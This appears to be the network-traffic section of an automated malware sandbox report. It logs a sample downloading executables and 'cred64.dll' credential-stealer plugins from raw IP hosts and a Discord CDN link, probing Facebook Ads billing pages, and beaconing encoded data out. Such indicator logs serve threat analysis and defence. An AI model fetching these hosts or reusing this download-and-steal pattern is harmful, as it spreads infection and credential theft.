                                Source: global trafficHTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=SpotifyAB.SpotifyMusic_zpdnekdrzrea0&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: EeCPIhUbXk2NhS0S.0.2.4Host: displaycatalog.mp.microsoft.com
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /8FXL68lvT7aMOUnACctqFTpqMRLtKqig9DEVpznPBh3kfqwD7H79IAr5YozSDHvqNJm1rAPxQcx2k1enZvClj3H5usqn8UYjyOXsusjFmGFLGWsE0IbrN51N2lt+X5GPvg6rlAPc7/z2I61aZ8FweIkQbGze+SDp/n9gfKAvEXzNpg== HTTP/1.1Host: 23.236.181.126
                                Source: global trafficHTTP traffic detected: GET /attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=ig4V6Bb52gMi05i2ty2QJMYY09WLeixE7KU4oSGFpMo-1672905581-0-ATpYTniRjaqpm5e9kq1sl0EntPiQOxpA1dSU9qlQv/9ZISlimeC5/eQ3izuUGJlIz92YWT6p0s0D/s8CFgyx90Y=
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                                Source: global trafficHTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 62.204.41.145
                                Source: global trafficHTTP traffic detected: GET /Nmkn5d9Dn/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.109
                                Source: global trafficHTTP traffic detected: GET /Legno.exe HTTP/1.1Host: 45.66.230.123
                                Source: global trafficHTTP traffic detected: GET /ano/anon.exe HTTP/1.1Host: 62.204.41.145
                                Source: global trafficHTTP traffic detected: GET /g8kdkeXs2qL/Plugins/cred64.dll HTTP/1.1Host: 45.66.230.123
                                Source: global trafficHTTP traffic detected: GET /baiden.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.135.33.28
                                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42Host: aaa.apiaaaeg.com
                                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42Host: aaa.apiaaaeg.com
                                Source: global trafficHTTP traffic detected: GET /mBsjv2swweP/Plugins/cred64.dll HTTP/1.1Host: 45.32.200.113
                                Source: global trafficHTTP traffic detected: GET /attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exe HTTP/1.1Host: cdn.discordapp.com
                                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42Host: aaa.apiaaaeg.com
                                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42Host: aaa.apiaaaeg.com
                                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42Host: aaa.apiaaaeg.com
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50838 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50827 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50833 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50474
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50482
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50770
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50482 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50827
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50356 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50837 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50832
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50834
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50712
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50833
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50835
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50838
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50837
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50830
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50839
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50839 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Jan 2023 07:59:43 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 298Connection: closeCF-Ray: 784aad1618772c63-FRACache-Control: private, max-age=0Content-Disposition: attachmentExpires: Thu, 05 Jan 2023 07:59:43 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400X-GUploader-UploadID: ADPycdtxz56kJCgClBaywbUM5x3tDiGOmsLDdkvOHNiA36bfW0seMEHPMuIN4ckJ4dKBxz9Jshqo9REcbVRO6FozU6PXzRMKxehuX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5fBpSavW5rlcg8HM5fchvpYRNedoGWFS%2BPLVH51c0HYFmyMen9gCVoRVRnrCAv0D22bnXQWPN94jo9qXXEz6wbezH5OCYuLENfxKtKnMnSuP%2F72EI5bkUzGwzKmKaG3KMDVgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GjS7TTEPvYs5m%2F9BnKsNclV%2BUfoINfMI2Yb4dPFEZda0YYD8j6kUPzjC%2BucXbl3j17iqMj8pDWzckeTb1yW0HYdddmDimXNLUWZtBdkhOk1mrhYFd9RTtXRs%2FM2cxEvB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab13bbfa9072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a Data Ascii: 7=R
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0xDTHBC5DmvZnmUVg4ZF%2BH7ubjPXUayx%2BOXGUnHeKnaq9b7sPQfNhtdus4eXtS6Xc2xpnABfUFuafFu3%2B7AKsEHtj3THQlC%2BWI1Heudj%2B0OCWgX9VEzgH4NKeKsOYl%2FU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab14bd199072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4b c7 5f 83 04 86 b8 54 f2 67 a0 7e 10 16 31 e5 75 05 2b 8e 51 2b 0a 6b 9f a8 9c b9 0d 0a Data Ascii: 2fUys/~(`:K_Tg~1u+Q+k
